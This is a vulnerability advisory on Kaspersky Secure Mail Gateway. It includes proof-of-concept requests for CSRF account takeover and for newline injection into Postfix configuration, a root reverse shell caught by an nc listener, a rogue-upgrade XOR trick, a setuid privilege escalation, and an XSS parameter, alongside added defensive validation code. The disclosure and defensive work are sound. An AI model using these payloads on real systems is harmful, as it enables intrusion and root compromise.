Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

Kaspersky Secure Mail Gateway Multiple Vulnerabilities

1. *Advisory Information*

Title: Kaspersky Secure Mail Gateway Multiple Vulnerabilities
Advisory ID: CORE-2017-0010
Advisory URL: http://www.coresecurity.com/advisories/kaspersky-secure-mail-gateway-multiple-vulnerabilities
Date published: 2018-02-01
Date of last update: 2018-02-01
Vendors contacted: Kaspersky Lab
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Cross-Site Request Forgery [CWE-352], Improper Neutralization of Special Elements in Output Used by a Downstream Component [CWE-74], Improper Privilege Management [CWE-269], Improper Neutralization of Input During Web Page Generation [CWE-79]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-pending-assignment-1, CVE-pending-assignment-2, CVE-pending-assignment-3, CVE-pending-assignment-4

3. *Vulnerability Description*

From Kaspersky Lab's website:

Kaspersky Secure Mail Gateway [1] gives you a fully integrated email system and mail security solution - including anti-spam, anti-malware, anti-phishing and more - in a single virtual appliance. It's easy to install and manage - so you save time on day-to-day mail and mail security tasks, while we deliver award-winning security that helps you keep your business safe and boost user productivity.

Multiple vulnerabilities were found in the Kaspersky Mail Gateway Web Management Console. A remote attacker could abuse these vulnerabilities to gain command execution as root.

4. *Vulnerable Packages*

Kaspersky Secure Mail Gateway 1.1.0.379

Other products and versions might be affected, but they were not tested.

5. *Vendor Information, Solutions and Workarounds*

Kaspersky Lab published the following advisory:

https://support.kaspersky.com/vulnerability.aspx?el=12430#010218

6. *Credits*

These vulnerabilities were discovered and researched by Leandro Barragan from Core Security Consulting Services. The publication of this advisory was coordinated by Alberto Solino from the Core Advisories Team.

7. *Technical Description / Proof of Concept Code*

Kaspersky Secure Mail Gateway is a virtual appliance designed to be deployed inside the organization's network infrastructure. It comes bundled with a Web Management Console to monitor the application status and manage its operation.

This Management Console provides no cross-site request forgery protection site-wide, which could result in administrative account takeover as shown in 7.1. In addition, an attacker who manages to get access to the Web Console could gain command execution as root (7.2) by injecting arbitrary content into the appliance's Postfix configuration. It is also possible to elevate privileges from kluser to root (7.3) by abusing a setuid binary shipped with the appliance, which executes a script located at an attacker-controlled location with root privileges. Apart from this, a reflected cross-site scripting vulnerability (7.4) was found which affects the Management Console.

7.1. *Cross-site Request Forgery leading to Administrative account takeover*

[CVE-pending-assignment-1]

There are no Anti-CSRF tokens in any forms on the Web interface. This would allow an attacker to submit authenticated requests when an authenticated user browses an attacker-controlled domain.

The "Import Application Settings" feature is particularly interesting because it allows users to restore a backup file that overwrites the appliance's configuration.

A settings backup file contains five zlib segments:

/-----
$ binwalk KSMG_settings.kz

DECIMAL       HEXADECIMAL     DESCRIPTION
------------------------------------------------------------------------------
16            0x10            Zlib compressed data, default compression
39            0x27            Zlib compressed data, default compression
2242          0x8C2           Zlib compressed data, default compression
2268          0x8DC           Zlib compressed data, default compression
3072          0xC00           Zlib compressed data, default compression
-----/

The last segment is a compressed backup of /var/opt/kaspersky/klms/db/passwd, which contains a list of usernames, passwords, and profiles, for example:

/-----
# cat /var/opt/kaspersky/klms/db/passwd
Administrator:7{E{I'}Ap{RpY~t/V28\lZ&,FM&97s5`6f5e51bd7ade638785f5e7476351839e:admin
-----/

An attacker can craft a backup file that contains their own passwd file, and then submit it by abusing the CSRF vulnerability. The appliance then overwrites the original passwd file, giving the attacker access to the Administrator account.

The following proof-of-concept request restores only account information in order to avoid changing the appliance's current configuration. Please note that the file contents were removed to make it more readable.
/-----
POST /ksmg/cgi-bin/klwi?action=importSettings&callback=CC3262C5 HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: multipart/form-data; boundary=---------------------------3463969741915053213976213766
Content-Length: 3935
Referer: https://server/ksmg/
Cookie: SID=7362ED7771E7213F0EFCE85B430E240D
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------3463969741915053213976213766
Content-Disposition: form-data; name="data"

{"importSections":{"importWebPasswords":true,"importMachineIndependent":false,"importMachineDependent":false,"machineDependent":{"importTraces":false,"importProxy":false,"importAuth":false,"importBackup":false,"backupImportSection":{"importFileStorage":false},"importScan":false,"scanImportSection":{"importFilterSocket":false},"importUpdater":false,"importQuarantine":false},"importRules":false,"importPersonal":false}}
-----------------------------3463969741915053213976213766
Content-Disposition: form-data; name="fileContent"; filename="KSMG_settings.kz"
Content-Type: application/octet-stream

[...Tampered configuration file...]
-----------------------------3463969741915053213976213766--
-----/

7.2. *Configuration file injection leading to Code Execution as Root*

[CVE-pending-assignment-2]

Using the Web Management Console it is possible to add a "BCC Address for all Messages". This configuration parameter is written verbatim to the appliance's Postfix main.cf configuration file. By adding LF characters to this parameter, it is possible to inject a configuration parameter that would allow an attacker to execute arbitrary commands on the appliance as root.
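As an added example (not Kaspersky's code and not part of the original advisory), the following shows the server-side handling that the setMtaSettings action lacks: a validator that refuses any control character in the alwaysBcc value before it is written to main.cf, and a small main.cf parser that flags the program-executing multi_instance_* directives abused in this section. The directive names and the sample main.cf content are taken from this advisory; the function names and the regex are my own assumptions.

```python
import re

# Constructed sample of /etc/postfix/main.cf after the injection in section 7.2;
# a multi-line directive is included to exercise continuation-line handling.
TAMPERED_MAIN_CF = """\
myhostname = ksmg.localdomain
smtpd_recipient_restrictions = permit_mynetworks,
    reject
always_bcc = test@test.com
multi_instance_enable=yes
multi_instance_wrapper=/tmp/klms-appliance-upgrade/upgrade.py
multi_instance_directories=/tmp
"""

# Directives that make Postfix run an external program on restart (the primitive
# abused in 7.2); an appliance that never uses multi-instance mode has no use for them.
EXEC_DIRECTIVES = {"multi_instance_enable", "multi_instance_wrapper",
                   "multi_instance_directories"}

# One plain mailbox address: no whitespace, no control characters, exactly one '@'.
ADDRESS_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")

def validate_always_bcc(value: str) -> bool:
    """True only if value may be written verbatim as 'always_bcc = <value>'.
    The injection relies on an embedded LF, so every control character is
    rejected before the address syntax is considered."""
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in value):
        return False
    return ADDRESS_RE.fullmatch(value) is not None

def parse_main_cf(text: str) -> dict:
    """Parse main.cf into {name: value}, skipping '#' comments and joining
    whitespace-led continuation lines onto the preceding value."""
    params, current = {}, None
    for raw in text.splitlines():
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue
        if raw[0] in " \t" and current is not None:
            params[current] += " " + raw.strip()   # continuation line
            continue
        name, sep, value = raw.partition("=")
        if not sep:
            continue                               # not a 'name = value' line
        current = name.strip()
        params[current] = value.strip()
    return params

def audit_main_cf(text: str) -> list:
    """Sorted names of program-executing directives found in the given main.cf."""
    return sorted(n for n in parse_main_cf(text) if n in EXEC_DIRECTIVES)
```

Running audit_main_cf over the appliance's real /etc/postfix/main.cf after each configuration change is a cheap detection for this class of injection, independent of the web layer.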
The following request injects arbitrary configuration settings into /etc/postfix/main.cf:

/-----
POST /ksmg/cgi-bin/klwi?action=setMtaSettings HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://server/ksmg/
Content-Length: 1541
Cookie: SID=7362ED7771E7213F0EFCE85B430E240D
Connection: close

data={"alwaysBcc":"test@test.com\nmulti_instance_enable=yes\nmulti_instance_wrapper=\/tmp\/klms-appliance-upgrade\/upgrade.py\nmulti_instance_directories=\/tmp","mydomain":"localdomain",[...SNIPPED...]
-----/

The resulting file looks as follows:

/-----
$ cat /etc/postfix/main.cf
...
always_bcc = test@test.com
multi_instance_enable=yes
multi_instance_wrapper=/tmp/klms-appliance-upgrade/upgrade.py
multi_instance_directories=/tmp
...
-----/

After that request is sent, Postfix is automatically restarted, and the file pointed to by multi_instance_wrapper is executed. In this proof-of-concept that parameter points to a Python reverse shell:

/-----
$ nc -lvvvp 1080
Listening on [0.0.0.0] (family 0, port 1080)
Connection from [server] port 1080 [tcp/socks] accepted (family 2, sport 42776)
sh: no job control in this shell
sh-4.1# id
id
uid=0(root) gid=497(klusers) groups=497(klusers),90(postdrop)
-----/

Please note that while abusing this behavior would allow attackers to execute any binary on the system, no arguments can be passed to it. In order to overcome this we abused another Web Console functionality to upload a Python script to the file system. That procedure is described next.

An attacker can write to /tmp/klms-appliance-upgrade/ using the Web Console's System Upgrade functionality. This feature takes an upgrade file (i.e. a KTGZ file), decodes it, and unpacks it into /tmp/klms-appliance-upgrade/.
KTGZ files can be crafted by creating a TAR.GZ file with a malicious upgrade.py file inside it, and then XORing it with the key 0xDF23B1ED. This key is static and hardcoded in the system's binaries.

When this file is uploaded using the Web Console, the upgrade process will fail, as it lacks the Kaspersky signature files. However, the content of the rogue upgrade file (including the modified upgrade.py file used in this proof-of-concept) will remain in /tmp/klms-appliance-upgrade/. It is worth noting that file permissions are preserved, so we can upload files with the executable bit set.

7.3. *Local Privilege Escalation*

[CVE-pending-assignment-3]

There is a setuid root binary located in /opt/kaspersky/klms-appliance/libexec/upgrade/:

/-----
$ ls -lha /opt/kaspersky/klms-appliance/libexec/upgrade/upgrade_launcher
-rws--x--- 1 root klusers 7,6K sep 24 2015 /opt/kaspersky/klms-appliance/libexec/upgrade/upgrade_launcher
-----/

This program looks for a Python script once executed:

/-----
$ /opt/kaspersky/klms-appliance/libexec/upgrade/upgrade_launcher
/usr/bin/python: can't open file '/tmp/klms-appliance-upgrade/upgrade.py': [Errno 2] No such file or directory
-----/

The /tmp/klms-appliance-upgrade/ directory is writable by kluser by default. If an attacker manages to run commands on the appliance as kluser, they could abuse this behaviour to elevate privileges to root by writing a malicious script at the aforementioned path and running the upgrade_launcher binary.

7.4. *Reflected Cross-Site Scripting*

[CVE-pending-assignment-4]

The callback parameter of the importSettings action method is vulnerable to cross-site scripting.

/-----
https://server/ksmg/cgi-bin/klwi?action=importSettings&callback=CC3262C5
-----/
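As an added example for the launcher behaviour in section 7.3 (not part of the advisory and not the appliance's code), this is the path check a privileged launcher should perform before executing a script: every component from a trusted base directory down to the script must be owned by the trusted user, must not be a symlink, and must not be group- or world-writable, which is exactly what a script under /tmp/klms-appliance-upgrade/ fails. The demo() function builds a constructed directory tree in a private temp directory and uses the current user as the trusted owner so it runs without root; the function names are my own.

```python
import os
import stat
import tempfile

def is_safe_script(path: str, trusted_base: str, trusted_uid: int = 0) -> bool:
    """True only if path is a regular file under trusted_base and every component
    from the file up to trusted_base is owned by trusted_uid, is not a symlink and
    is not group- or world-writable. The launcher in 7.3 performs no such check and
    runs a script out of a kluser-writable directory. Missing paths raise OSError,
    which a launcher should treat as 'do not run'."""
    path, base = os.path.abspath(path), os.path.abspath(trusted_base)
    if os.path.commonpath([path, base]) != base:
        return False                      # script lies outside the trusted tree
    current = path
    while True:
        st = os.lstat(current)            # lstat: never follow links while checking
        if stat.S_ISLNK(st.st_mode) or (current == path and not stat.S_ISREG(st.st_mode)):
            return False
        if st.st_uid != trusted_uid or st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            return False                  # someone other than the owner can tamper
        if current == base:
            return True
        current = os.path.dirname(current)

def _write_script(directory: str) -> str:
    """Constructed stand-in for upgrade.py, owned by the caller with mode 0700."""
    script = os.path.join(directory, "upgrade.py")
    with open(script, "w") as fh:
        fh.write("print('upgrade')\n")
    os.chmod(script, 0o700)
    return script

def demo() -> dict:
    """Build a constructed tree in a private temp dir; the current user stands in
    for root so this runs unprivileged. One layout is sound, the other mimics the
    world-writable /tmp/klms-appliance-upgrade/ directory from the advisory."""
    me, base = os.getuid(), tempfile.mkdtemp()
    os.chmod(base, 0o700)
    good_dir = os.path.join(base, "libexec")
    os.mkdir(good_dir, 0o700)
    good = _write_script(good_dir)
    bad_dir = os.path.join(base, "klms-appliance-upgrade")
    os.mkdir(bad_dir, 0o700)
    bad = _write_script(bad_dir)
    os.chmod(bad_dir, 0o1777)             # sticky + world-writable, like /tmp
    return {"trusted_tree": is_safe_script(good, base, me),
            "world_writable_dir": is_safe_script(bad, base, me),
            "outside_base": is_safe_script(good, bad_dir, me)}
```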